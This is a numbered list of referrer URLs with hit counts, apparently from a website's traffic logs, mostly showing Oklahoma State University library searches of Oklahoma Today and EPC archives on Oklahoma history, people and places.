1829http://search.yahoo.com/search?p=weldon+hill&ei=UTF-8&fr=moz2&pstart=1&b=1511
1830http://search1.seznam.cz/google?q=dollz+frieship1
1831http://search.yahoo.com/search?webSrchInput=oklahoma+today&ei=UTF-8&fr=ush-ma...1
1832http://webferret.search.com/click?wf6,osage+prayers,,digital.library.okstate....1
1833http://verden.abcsok.no/index.html?q=Barbara+Palmer+Quilting&lr=1
1834http://verden.abcsok.no/index.html?q=Number+of+states+1958&lr=1
1835http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1836http://webferret.search.com/click?wf6,Osage+prayers,,digital.library.okstate....1
1837http://trazilica.tportal.hr/fast-cgi/tsc?mandant=croatia&device=html&portalla...1
1838http://tulsa.cox.net/cci/search/google?_mode=view&_state=normal1
1839http://verden.abcsok.no/index.html?page=10&q=indan+ceef&cs=latin1&offset=1
1840http://us.f837.mail.yahoo.com/ym/ShowLetter?MsgId=2751_70478833_29154_1789_22...1
1841http://www.google.co.uk/search?hl=en&ie=ISO-8859-1&q=lemon+chess+pie+the+kitc...1
1842http://libgooglem.library.okstate.edu/search?q=Sally+Kern&site=OKToday&sort=d...1
1843http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1844http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1845http://libgooglem.library.okstate.edu/search?q=Staking+a+claim&site=EPC&btnG=...1
1846http://libgooglem.library.okstate.edu/search?q=Steve+Wilson&site=EPC&btnG=EPC...1
1847http://libgooglem.library.okstate.edu/search?q=Quanah+Parker&site=OKToday&btn...1
1848http://libgooglem.library.okstate.edu/search?q=Relative+humidity++transmitter...1
1849http://libgooglem.library.okstate.edu/search?q=Roberta+Whiteshield&site=EPC&b...1
1850http://libgooglem.library.okstate.edu/search?q=Remote+Sensing%2C+Third+Editio...1
1851http://libgooglem.library.okstate.edu/search?q=Pine+Ridge+Lakota&site=EPC&btn...1
1852http://libgooglem.library.okstate.edu/search?q=The+intelligence+lives+at+fami...1
1853http://libgooglem.library.okstate.edu/search?q=Tulsa+Race+Riot+reparations&si...1
1854http://libgooglem.library.okstate.edu/search?q=The+family+gateway+designs+&si...1
1855http://libgooglem.library.okstate.edu/search?q=UAV&site=EPC&btnG=EPC+Search&o...1
1856http://libgooglem.library.okstate.edu/search?q=Steven+mopope&site=EPC&btnG=EP...1
1857http://libgooglem.library.okstate.edu/search?q=Stratford+Killing+1928&site=EP...1
1858http://libgooglem.library.okstate.edu/search?q=Thackerville&site=EPC&btnG=EPC...1
1859http://libgooglem.library.okstate.edu/search?q=Susie+Peters&site=EPC&btnG=EPC...1
1860http://libgooglem.library.okstate.edu/search?q=Vallery+Brown&site=OKToday&btn...1
1861http://libgooglem.library.okstate.edu/search?q=NRHA&site=OKToday&sort=date%3A...1
1862http://libgooglem.library.okstate.edu/search?q=Needmore%2C+1917&site=EPC&btnG...1
1863http://libgooglem.library.okstate.edu/search?q=Myra+Maybelle+Shirley&site=OKT...1
1864http://libgooglem.library.okstate.edu/search?filter=0&access=p&sort=date%3AD%...1
1865http://libgooglem.library.okstate.edu/search?q=Newton+Murphey&site=EPC&btnG=E...1
1866http://libgooglem.library.okstate.edu/search?q=Material+automatic+monitoring+...1
1867http://libgooglem.library.okstate.edu/search?q=May+Avenue&site=EPC&btnG=EPC+S...1
1868http://libgooglem.library.okstate.edu/search?q=Murrah+Building&site=OKToday&s...1
1869http://libgooglem.library.okstate.edu/search?q=Mexican+restaurants+in+OKC&sit...1
1870http://libgooglem.library.okstate.edu/search?q=Pauls+Valley&site=OKToday&sort...1
1871http://libgooglem.library.okstate.edu/search?q=Orlando+tragedy&site=EPC&btnG=...1
1872http://libgooglem.library.okstate.edu/search?q=Outlaws+in+the+twin+territorie...1
1873http://libgooglem.library.okstate.edu/search?q=Oreana+&site=EPC&btnG=EPC+Sear...1
1874http://libgooglem.library.okstate.edu/search?q=Owens+rabies&site=EPC&btnG=EPC...1
1875http://libgooglem.library.okstate.edu/search?q=November%2Fdecember+2007&site=...1
1876http://libgooglem.library.okstate.edu/search?q=Oklahoma+City+Bombing&site=OKT...1
1877http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1878http://libgooglem.library.okstate.edu/search?q=Old+Boggy+Cemetery&site=OKToda...1
1879http://libgooglem.library.okstate.edu/search?q=MONK&site=EPC&btnG=EPC+Search&...1
1880http://libgooglem.library.okstate.edu/search?q=black+mesa&site=OKToday&btnG=S...1
1881http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AS%3Ad1&...1
1882http://libgooglem.library.okstate.edu/search?q=black+mesa&site=EPC&sort=date%...1
1883http://libgooglem.library.okstate.edu/search?q=body+language&site=EPC&sort=da...1
1884http://libgooglem.library.okstate.edu/search?q=bose+gas&site=EPC&btnG=EPC+Sea...1
1885http://libgooglem.library.okstate.edu/search?q=bigfoot&site=OKToday&sort=date...1
1886http://libgooglem.library.okstate.edu/search?q=billie+letts&site=OKToday&sort...1
1887http://libgooglem.library.okstate.edu/search?access=p&start=10&sort=date%3AD%...1
1888http://libgooglem.library.okstate.edu/search?q=billy+tubbs+barbecue&site=OKTo...1
1889http://libgooglem.library.okstate.edu/search?q=bigfoot&site=EPC&sort=date%3AD...1
1890http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
1891http://libgooglem.library.okstate.edu/search?q=cache:S1eoCYkHVpYJ:digital.lib...1
1892http://libgooglem.library.okstate.edu/search?q=cache:BHcf47YXw0AJ:digital.lib...1
1893http://libgooglem.library.okstate.edu/search?q=cache:UV3_nSPft78J:digital.lib...1
1894http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
1895http://libgooglem.library.okstate.edu/search?q=buffalo+soldiers&site=EPC&outp...1
1896http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
1897http://libgooglem.library.okstate.edu/search?q=bunch&site=EPC&btnG=EPC+Search...1
1898http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1899http://libgooglem.library.okstate.edu/search?q=advance+booking+of+commercial+...1
1900http://libgooglem.library.okstate.edu/search?q=aged+to+perfection&site=OKToda...1
1901http://libgooglem.library.okstate.edu/search?q=adair+county+oklahoma+wpa+rds&...1
1902http://libgooglem.library.okstate.edu/search?q=alfalfa+bill+murray&site=EPC&b...1
1903http://libgooglem.library.okstate.edu/search?q=apartment+rentals&spell=1&acce...1
1904http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1905http://libgooglem.library.okstate.edu/search?q=Winter+1996&site=OKToday&sort=...1
1906http://libgooglem.library.okstate.edu/search?q=Younger%27s+Bend&site=OKToday&...1
1907http://libgooglem.library.okstate.edu/search?q=World+population&site=OKToday&...1
1908http://libgooglem.library.okstate.edu/search?q=best+places+to+eat&site=OKToda...1
1909http://libgooglem.library.okstate.edu/search?q=bartlesville+SCHOOLS+2007&site...1
1910http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1911http://libgooglem.library.okstate.edu/search?q=baffalo+valley&site=EPC&sort=d...1
1912http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1913http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1914http://libgooglem.library.okstate.edu/search?q=arnold&site=EPC&btnG=EPC+Searc...1
1915http://libgooglem.library.okstate.edu/search?q=bach&site=EPC&btnG=EPC+Search&...1
1916http://libgooglem.library.okstate.edu/search?client=EPC&output=xml_no_dtd&pro...1
1917http://libgooglem.library.okstate.edu/search?q=cache:kgCc1EsrYywJ:digital.lib...1
1918http://libgooglem.library.okstate.edu/search?q=City+and+countryside+overall+p...1
1919http://libgooglem.library.okstate.edu/search?q=%22three+forks+country%22&site...1
1920http://libgooglem.library.okstate.edu/search?q=Churches+in+downtown&site=EPC&...1
1921http://libgooglem.library.okstate.edu/search?q=Concho+Hill&site=EPC&btnG=EPC+...1
1922http://libgooglem.library.okstate.edu/search?q=%22teacher+education%22&site=E...1
1923http://libgooglem.library.okstate.edu/search?q=+cattledrive&site=EPC&btnG=EPC...1
1924http://libgooglem.library.okstate.edu/search?q=CPB&site=EPC&btnG=EPC+Search&s...1
1925http://libgooglem.library.okstate.edu/search?q=Choctaw+National+Lighthorsemen...1
1926http://libgooglem.library.okstate.edu/search?q=Chief+Imports&site=EPC&btnG=EP...1
1927http://libgooglem.library.okstate.edu/search?q=Bridge+Seismic&site=EPC&btnG=E...1
1928http://libgooglem.library.okstate.edu/search?q=E+K+Gaylord+II&site=EPC&btnG=E...1
1929http://libgooglem.library.okstate.edu/search?q=FIRESTONE+FACTORY&site=EPC&btn...1
1930http://libgooglem.library.okstate.edu/search?q=Drumright&site=EPC&output=xml_...1
1931http://libgooglem.library.okstate.edu/search?q=FRED+JONES+ENTERPRISES&site=EP...1
1932http://libgooglem.library.okstate.edu/search?q=%22state+bird%22&site=EPC&btnG...1
1933http://libgooglem.library.okstate.edu/search?q=Delaware+Chief&site=EPC&btnG=E...1
1934http://libgooglem.library.okstate.edu/search?q=Drama&site=EPC&btnG=EPC+Search...1
1935http://libgooglem.library.okstate.edu/search?q=Denham&site=EPC&btnG=EPC+Searc...1
1936http://libgooglem.library.okstate.edu/search?q=Feedback+principle&site=EPC&bt...1
1937http://libgooglem.library.okstate.edu/search?q=1978+Tulsa+High+School+All+Cit...1
1938http://libgooglem.library.okstate.edu/search?q=1989+china&site=EPC&btnG=EPC+S...1
1939http://libgooglem.library.okstate.edu/search?q=+logistics+and+transport&site=...1
1940http://libgooglem.library.okstate.edu/search?q=+logistics+and+transport&site=...1
1941http://libgooglem.library.okstate.edu/search?q=2006&site=OKToday&btnG=EPC+Sea...1
1942http://libgooglem.library.okstate.edu/search?q=101+ranch&site=OKToday&btnG=Se...1
1943http://libgooglem.library.okstate.edu/search?q=1901+Lawton+Lane+Lottery&site=...1
1944http://libgooglem.library.okstate.edu/search?q=1956&site=OKToday&btnG=EPC+Sea...1
1945http://libgooglem.library.okstate.edu/search?q=10+th+circuit+court+on+1866+tr...1
1946http://libgooglem.library.okstate.edu/search?q=Braggs+Oklahoma&site=OKToday&b...1
1947http://libgooglem.library.okstate.edu/search?q=Belle+Starr&site=OKToday&btnG=...1
1948http://libgooglem.library.okstate.edu/search?q=Best+Doctors&site=OKToday&sort...1
1949http://libgooglem.library.okstate.edu/search?q=Babbs+Switch&site=EPC&btnG=EPC...1
1950http://libgooglem.library.okstate.edu/search?q=Boise+City+bombing&site=EPC&bt...1
1951http://libgooglem.library.okstate.edu/search?q=2007&site=OKToday&btnG=Search&...1
1952http://libgooglem.library.okstate.edu/search?q=Adverse+Drug+Event+suit&site=E...1
1953http://libgooglem.library.okstate.edu/search?q=Alice+Littleman&site=EPC&btnG=...1
1954http://libgooglem.library.okstate.edu/search?q=Aged+to+Perfection&site=OKToda...1
1955http://libgooglem.library.okstate.edu/search?q=%22101+ranch%22&site=OKToday&b...1
1956http://libgooglem.library.okstate.edu/search?q=%22migrant+mother%22&site=EPC&...1
1957http://libgooglem.library.okstate.edu/search?q=January+February+2004+&site=OK...1
1958http://libgooglem.library.okstate.edu/search?q=JANUARY+1955&site=OKToday&btnG...1
1959http://libgooglem.library.okstate.edu/search?q=Joe+Koberling&site=EPC&btnG=EP...1
1960http://libgooglem.library.okstate.edu/search?q=July%2FAugust+2006%5C&site=OKT...1
1961http://libgooglem.library.okstate.edu/search?q=%22migrant+mother%22&site=EPC&...1
1962http://libgooglem.library.okstate.edu/search?q=Indian+Mysticism&site=EPC&btnG...1
1963http://libgooglem.library.okstate.edu/search?q=Industry+automation&site=EPC&o...1
1964http://libgooglem.library.okstate.edu/search?q=Industrial+Design&site=OKToday...1
1965http://libgooglem.library.okstate.edu/search?q=Horace+Poolaw&site=EPC&btnG=EP...1
1966http://libgooglem.library.okstate.edu/search?q=%22Clyde+Warrior%22&site=EPC&b...1
1967http://libgooglem.library.okstate.edu/search?q=Lowe+Runkle&site=OKToday&btnG=...1
1968http://libgooglem.library.okstate.edu/search?q=%22Myra+Maybelle+Shirley%22&si...1
1969http://libgooglem.library.okstate.edu/search?q=%22101+ranch+wild+west+show%22...1
1970http://libgooglem.library.okstate.edu/search?q=%22Taft+school%22&site=EPC&btn...1
1971http://libgooglem.library.okstate.edu/search?q=Kamp+Groceries&site=EPC&btnG=E...1
1972http://libgooglem.library.okstate.edu/search?q=Kerosene+Oil&site=EPC&btnG=EPC...1
1973http://libgooglem.library.okstate.edu/search?q=%22Reuel+Little%22&site=EPC&so...1
1974http://libgooglem.library.okstate.edu/search?q=%22robert+vickery%22&site=EPC&...1
1975http://libgooglem.library.okstate.edu/search?q=GRIFFIN%2C+BENNETT+HILL&site=E...1
1976http://libgooglem.library.okstate.edu/search?q=Gay+Rights&site=EPC&btnG=EPC+S...1
1977http://libgooglem.library.okstate.edu/search?q=GERONIMO&site=EPC&btnG=EPC+Sea...1
1978http://libgooglem.library.okstate.edu/search?q=GrayHorse+School&site=EPC&btnG...1
1979http://libgooglem.library.okstate.edu/search?q=Greenleaf+Lodge&site=EPC&outpu...1
1980http://libgooglem.library.okstate.edu/search?q=Ferdinandia&site=EPC&btnG=EPC+...1
1981http://libgooglem.library.okstate.edu/search?q=Freedom+Center+in+Oklahoma&sit...1
1982http://libgooglem.library.okstate.edu/search?q=Foster+Ranch&site=EPC&sort=dat...1
1983http://libgooglem.library.okstate.edu/search?q=Homeschooling&site=EPC&btnG=EP...1
1984http://libgooglem.library.okstate.edu/search?q=Herbert+Galey+1935&site=EPC&bt...1
1985http://libgooglem.library.okstate.edu/search?q=Hispanic+area+OKC&site=EPC&out...1
1986http://libgooglem.library.okstate.edu/search?q=Hell%27s+Angels&site=EPC&btnG=...1
1987http://libgooglem.library.okstate.edu/search?q=Hoggard&site=EPC&btnG=EPC+Sear...1
1988http://libgooglem.library.okstate.edu/search?q=Grove+Grand+Lake&site=OKToday&...1
1989http://libgooglem.library.okstate.edu/search?q=HISTORY&site=OKToday&sort=date...1
1990http://libgooglem.library.okstate.edu/search?q=Heavener+train&site=EPC&btnG=E...1
1991http://libgooglem.library.okstate.edu/search?q=Harrelson&site=EPC&btnG=EPC+Se...1
1992http://libgooglem.library.okstate.edu/search?q=post+modernism&site=EPC&btnG=E...1
1993http://libgooglem.library.okstate.edu/search?q=maggie+mathews&site=EPC&sort=d...1
1994http://libgooglem.library.okstate.edu/search?q=maggie+thrasher&site=EPC&btnG=...1
1995http://libgooglem.library.okstate.edu/search?q=mackay%2C+deputy+marshals&site...1
1996http://libgooglem.library.okstate.edu/search?q=maps+stagecoach&site=EPC&btnG=...1
1997http://libgooglem.library.okstate.edu/search?q=march%2Fapril+1956&site=OKToda...1
1998http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
1999http://libgooglem.library.okstate.edu/search?q=lizards+of+oklahoma&site=EPC&s...1
2000http://libgooglem.library.okstate.edu/search?q=lost+treasure&site=EPC&btnG=EP...1
2001http://libgooglem.library.okstate.edu/search?q=loot&site=EPC&output=xml_no_dt...1
2002http://libgooglem.library.okstate.edu/search?q=license+plates&site=OKToday&so...1
2003http://libgooglem.library.okstate.edu/search?q=mcClain+co.+deputy+marshals&si...1
2004http://libgooglem.library.okstate.edu/search?q=mccleary&site=EPC&btnG=EPC+Sea...1
2005http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2006http://libgooglem.library.okstate.edu/search?q=mccune&site=OKToday&sort=date%...1
2007http://libgooglem.library.okstate.edu/search?q=marge+murray%27s+best+pound+ca...1
2008http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2009http://libgooglem.library.okstate.edu/search?q=may%2Fjune+2006%5C&site=OKToda...1
2010http://libgooglem.library.okstate.edu/search?q=mary+logan+wolf&site=OKToday&s...1
2011http://libgooglem.library.okstate.edu/search?q=mears&site=OKToday&btnG=EPC+Se...1
2012http://libgooglem.library.okstate.edu/search?q=inspirations+tea+room&site=OKT...1
2013http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2014http://libgooglem.library.okstate.edu/search?q=indian+trail+map&site=OKToday&...1
2015http://libgooglem.library.okstate.edu/search?q=interstate+35&site=OKToday&sor...1
2016http://libgooglem.library.okstate.edu/search?q=jackie+longacre&site=EPC&sort=...1
2017http://libgooglem.library.okstate.edu/search?q=illiteracy&site=OKToday&btnG=S...1
2018http://libgooglem.library.okstate.edu/search?q=indian+casinos&site=OKToday&so...1
2019http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2020http://libgooglem.library.okstate.edu/search?q=indian+land++sold+texaco&site=...1
2021http://libgooglem.library.okstate.edu/search?q=ladd&site=EPC&btnG=EPC+Search&...1
2022http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2023http://libgooglem.library.okstate.edu/search?q=kiowa+county+sheriff&site=EPC&...1
2024http://libgooglem.library.okstate.edu/search?q=john+davis&site=EPC&sort=date%...1
2025http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2026http://libgooglem.library.okstate.edu/search?q=jacob+stallings&site=EPC&btnG=...1
2027http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2028http://libgooglem.library.okstate.edu/search?q=joan+frederick+denton&site=EPC...1
2029http://libgooglem.library.okstate.edu/search?q=jenson&site=EPC&btnG=EPC+Searc...1
2030http://libgooglem.library.okstate.edu/search?q=ike+rude&site=EPC&btnG=EPC+Sea...1
2031http://libgooglem.library.okstate.edu/search?q=original+issue&site=OKToday&so...1
2032http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2033http://libgooglem.library.okstate.edu/search?q=oreana&site=EPC&btnG=EPC+Searc...1
2034http://libgooglem.library.okstate.edu/search?q=overholser+mansion&site=EPC&bt...1
2035http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2036http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2037http://libgooglem.library.okstate.edu/search?access=p&safe=on&safe=on&sort=da...1
2038http://libgooglem.library.okstate.edu/search?q=omega+psi+phi&site=EPC&sort=da...1
2039http://libgooglem.library.okstate.edu/search?q=old+schools+davis+ok&site=EPC&...1
2040http://libgooglem.library.okstate.edu/search?q=oklahoma+wineries&site=OKToday...1
2041http://libgooglem.library.okstate.edu/search?q=pipelines+maps&site=EPC&btnG=E...1
2042http://libgooglem.library.okstate.edu/search?q=plastics&site=EPC&btnG=EPC+Sea...1
2043http://libgooglem.library.okstate.edu/search?q=pipeline+tow&site=EPC&output=x...1
2044http://libgooglem.library.okstate.edu/search?q=post+land+run+conditions+for+p...1
2045http://libgooglem.library.okstate.edu/search?q=parking+meter&site=EPC&btnG=EP...1
2046http://libgooglem.library.okstate.edu/search?q=photographs&site=EPC&btnG=EPC+...1
2047http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
2048http://libgooglem.library.okstate.edu/search?q=photos+of+carl+albert+college+...1
2049http://libgooglem.library.okstate.edu/search?q=medicine+park&site=OKToday&btn...1
2050http://libgooglem.library.okstate.edu/search?q=mountains&site=OKToday&output=...1
2051http://libgooglem.library.okstate.edu/search?q=muskogee+oklahoma+photos&site=...1
2052http://libgooglem.library.okstate.edu/search?q=moon+mccurtain+county&site=EPC...1
2053http://libgooglem.library.okstate.edu/search?q=native+americans+notions+of+fa...1
2054http://libgooglem.library.okstate.edu/search?q=new+database+technology+&site=...1
2055http://libgooglem.library.okstate.edu/search?q=melvin+lee&site=EPC&btnG=EPC+S...1
2056http://libgooglem.library.okstate.edu/search?q=mindless+eating&site=EPC&sort=...1
2057http://libgooglem.library.okstate.edu/search?q=mobile+database&site=EPC&btnG=...1
2058http://libgooglem.library.okstate.edu/search?q=mine+hoists+&site=EPC&btnG=EPC...1
2059http://libgooglem.library.okstate.edu/search?q=oklahoma+state+food&site=OKTod...1
2060http://libgooglem.library.okstate.edu/search?q=oklahoma+city+neighborhoods&si...1
2061http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2062http://libgooglem.library.okstate.edu/search?q=oklahoma+city+bombing&site=OKT...1
2063http://libgooglem.library.okstate.edu/search?q=oklahoma+recycle+centers&site=...1
2064http://libgooglem.library.okstate.edu/search?q=nicutt&site=EPC&sort=date%3AD%...1
2065http://libgooglem.library.okstate.edu/search?q=norway+music&site=EPC&sort=dat...1
2066http://libgooglem.library.okstate.edu/search?q=oakhurst&site=EPC&btnG=EPC+Sea...1
2067http://libgooglem.library.okstate.edu/search?q=nsu+history&site=EPC&btnG=EPC+...1
2068http://libgooglem.library.okstate.edu/search?q=cache:pA-2CyvkF-cJ:digital.lib...1
2069http://libgooglem.library.okstate.edu/search?q=cordery&site=EPC&btnG=EPC+Sear...1
2070http://libgooglem.library.okstate.edu/search?q=crude+cushing+1929&site=EPC&bt...1
2071http://libgooglem.library.okstate.edu/search?q=confederate+mail+carriers&site...1
2072http://libgooglem.library.okstate.edu/search?q=cup+fungi&site=EPC&btnG=EPC+Se...1
2073http://libgooglem.library.okstate.edu/search?q=cushing+field&site=EPC&btnG=EP...1
2074http://libgooglem.library.okstate.edu/search?q=cold+gas+dynamic+spraying+&sit...1
2075http://libgooglem.library.okstate.edu/search?q=color+words&site=OKToday&btnG=...1
2076http://libgooglem.library.okstate.edu/search?q=company+sondheim&site=EPC&btnG...1
2077http://libgooglem.library.okstate.edu/search?q=color+words&site=OKToday&sort=...1
2078http://libgooglem.library.okstate.edu/search?q=cogburn&site=EPC&btnG=EPC+Sear...1
2079http://libgooglem.library.okstate.edu/search?q=discover+oklahoma&site=OKToday...1
2080http://libgooglem.library.okstate.edu/search?q=discover+oklahoma&spell=1&acce...1
2081http://libgooglem.library.okstate.edu/search?q=dickerson+purcell&site=EPC&sor...1
2082http://libgooglem.library.okstate.edu/search?q=dissertation&spell=1&access=p&...1
2083http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2084http://libgooglem.library.okstate.edu/search?q=dawson+produce+Chickasha+OK&si...1
2085http://libgooglem.library.okstate.edu/search?q=devils+canyon&site=EPC&btnG=EP...1
2086http://libgooglem.library.okstate.edu/search?q=deep+fork&site=OKToday&sort=da...1
2087http://libgooglem.library.okstate.edu/search?q=doctor+e+a++jones&site=EPC&btn...1
2088http://libgooglem.library.okstate.edu/search?q=caving+banks&site=EPC&btnG=EPC...1
2089http://libgooglem.library.okstate.edu/search?q=charles+w+giffin&site=EPC&btnG...1
2090http://libgooglem.library.okstate.edu/search?q=cave+speakeasy+in+Tulsa&site=E...1
2091http://libgooglem.library.okstate.edu/search?q=cherokeestrip&site=EPC&btnG=EP...1
2092http://libgooglem.library.okstate.edu/search?q=chet+baker&site=EPC&btnG=EPC+S...1
2093http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2094http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2095http://libgooglem.library.okstate.edu/search?q=catastrophic+impact&site=EPC&b...1
2096http://libgooglem.library.okstate.edu/search?q=casinos+and+benefits&spell=1&a...1
2097http://libgooglem.library.okstate.edu/search?q=coe&site=EPC&sort=date%3AD%3AL...1
2098http://libgooglem.library.okstate.edu/search?q=chinese+law+and+government&sit...1
2099http://libgooglem.library.okstate.edu/search?q=choctaw+medicine+man&spell=1&a...1
2100http://libgooglem.library.okstate.edu/search?q=chimney+rock&site=EPC&btnG=EPC...1
2101http://libgooglem.library.okstate.edu/search?q=clermont&site=EPC&btnG=EPC+Sea...1
2102http://libgooglem.library.okstate.edu/search?q=cheyenne+tribe&site=OKToday&so...1
2103http://libgooglem.library.okstate.edu/search?q=chickasaw+baskets&site=EPC&sor...1
2104http://libgooglem.library.okstate.edu/search?q=chief+atoka&spell=1&access=p&o...1
2105http://libgooglem.library.okstate.edu/search?q=chicken+fried+steak&site=OKTod...1
2106http://libgooglem.library.okstate.edu/search?q=hurricane+related+deaths&site=...1
2107http://libgooglem.library.okstate.edu/search?q=gold+NEXT+Chimney+rock&site=EP...1
2108http://libgooglem.library.okstate.edu/search?q=goldie+st+clair&site=EPC&btnG=...1
2109http://libgooglem.library.okstate.edu/search?q=gold&site=EPC&btnG=EPC+Search&...1
2110http://libgooglem.library.okstate.edu/search?q=goodwell&site=EPC&output=xml_n...1
2111http://libgooglem.library.okstate.edu/search?q=goose+nest+zinc+mine&site=EPC&...1
2112http://libgooglem.library.okstate.edu/search?q=george+kimmel&site=EPC&sort=da...1
2113http://libgooglem.library.okstate.edu/search?q=george+kimmel++in+a+cover+wago...1
2114http://libgooglem.library.okstate.edu/search?q=gloss&site=OKToday&btnG=Search...1
2115http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2116http://libgooglem.library.okstate.edu/search?q=george+f+joiner&site=EPC&btnG=...1
2117http://libgooglem.library.okstate.edu/search?q=historic+school+davis+ok&site=...1
2118http://libgooglem.library.okstate.edu/search?q=holy+family+tulsa&site=EPC&sor...1
2119http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2120http://libgooglem.library.okstate.edu/search?q=hrms&site=EPC&btnG=EPC+Search&...1
2121http://libgooglem.library.okstate.edu/search?q=greenleaf&site=OKToday&sort=da...1
2122http://libgooglem.library.okstate.edu/search?q=greenleaf+1941&site=EPC&btnG=E...1
2123http://libgooglem.library.okstate.edu/search?q=hell%27s+angels&site=EPC&btnG=...1
2124http://libgooglem.library.okstate.edu/search?q=growing+mushrooms&site=OKToday...1
2125http://libgooglem.library.okstate.edu/search?q=dover+train+wreck+1906&site=EP...1
2126http://libgooglem.library.okstate.edu/search?q=eischen%27s+bar&site=OKToday&s...1
2127http://libgooglem.library.okstate.edu/search?q=el+reno+sanitorium&site=EPC&so...1
2128http://libgooglem.library.okstate.edu/search?q=ed+199+page+45+sheet+4b&site=E...1
2129http://libgooglem.library.okstate.edu/search?q=el+rio+verde&site=OKToday&sort...1
2130http://libgooglem.library.okstate.edu/search?q=electric+ceramics&site=EPC&out...1
2131http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2132http://libgooglem.library.okstate.edu/search?q=eck&site=OKToday&btnG=EPC+Sear...1
2133http://libgooglem.library.okstate.edu/search?q=eating+utensil&site=EPC&btnG=E...1
2134http://libgooglem.library.okstate.edu/search?q=forty+must+visit+places&site=O...1
2135http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2136http://libgooglem.library.okstate.edu/search?q=fork+in+the+road+july+august+2...1
2137http://libgooglem.library.okstate.edu/search?q=ferdinandia+wichita+village+fr...1
2138http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2139http://libgooglem.library.okstate.edu/search?q=electric+fuel+injection&site=E...1
2140http://libgooglem.library.okstate.edu/search?q=ethnic+groups&site=OKToday&out...1
2141http://libgooglem.library.okstate.edu/search?q=faudree&site=EPC&btnG=EPC+Sear...1
2142http://libgooglem.library.okstate.edu/search?access=p&sort=date%3AD%3AL%3Ad1&...1
2143http://www.google.com/search?hl=en&q=heller+park+tulsa+walking+path+distance1
2144http://www.google.com/search?hl=en&q=Artesian+Springs+Housing+%2C+Oklahoma+Ci...1
2145http://www.google.com/search?hl=en&q=Artist+Fred+Olds+from+Oklahoma&btnG=Goog...1
2146http://www.google.com/search?hl=en&q=Alice+Littleman1
2147http://www.google.com/search?hl=en&q=August+Wildflowers+in+Osage+Hills+of+Okl...1
2148http://www.google.com/search?hl=en&q=Bailey+Smith+del+city+ok+1979+singing1
2149http://www.google.com/search?hl=en&q=205th+Communication+Maintenance+Squadron...1
2150http://www.google.com/search?hl=en&q=918-782-30661
2151http://www.google.com/search?hl=en&q=Addie+Lee+Barker&btnG=Search1
2152http://www.google.com/search?hl=en&q=A+truck+was+traveling+down+the+highway+a...1
2153http://digital.library.okstate.edu/oktoday/images/okt.css1
2154http://www.google.com/search?hl=en&q=Choctaw+Indian+Honobia+word+meaning1
2155http://www.google.com/search?hl=en&q=Clift%2C+Mearl%2BHoldenville%2C+OK1
2156http://www.google.com/search?hl=en&q=CHINABERRIES+SOAP+BERRIES+OKLAHOMA&btnG=...1
2157http://www.google.com/search?hl=en&q=Coalgate+gas+boom&btnG=Search1
2158http://www.google.com/search?hl=en&q=Becky+luker1
2159http://www.google.com/search?hl=en&q=Blue+Jacket+Mountains%2C+Okla.&btnG=Goog...1
2160http://www.google.com/search?hl=en&q=C.B.+Goddard+of+Oklahoma%2C+Oil1
2161http://www.google.com/search?hl=en&q=Bob+Swaffar+arm1
2162http://www.google.com/search?hl=en&q=Cowboy+Flats+Oklahoma1
2163http://www.google.com/search?hl=en&q=1889er+Society&btnG=Google+Search1
2164http://www.google.com/search?hl=en&q=1952+beloit+college+basketball+team+%2Bf...1
2165http://www.google.com/search?hl=en&q=1517+Piney+Wood%2C+McAlester%2C+Oklahoma...1
2166http://www.google.com/search?hl=en&q=1956+chey+wagon+for+sale&btnG=Google+Sea...1
2167http://www.google.com/search?hl=en&q=1957+boomtown+oklahoma+semi+centenial1
2168http://www.google.com/search?hl=en&q=+is+Zack+Custer+the+gayest+boy&btnG=Sear...1
2169http://www.google.com/search?hl=en&q=+joan+wolfe+oklahoma&btnG=Search1
2170http://www.google.com/search?hl=en&q=0klahoma+spas1
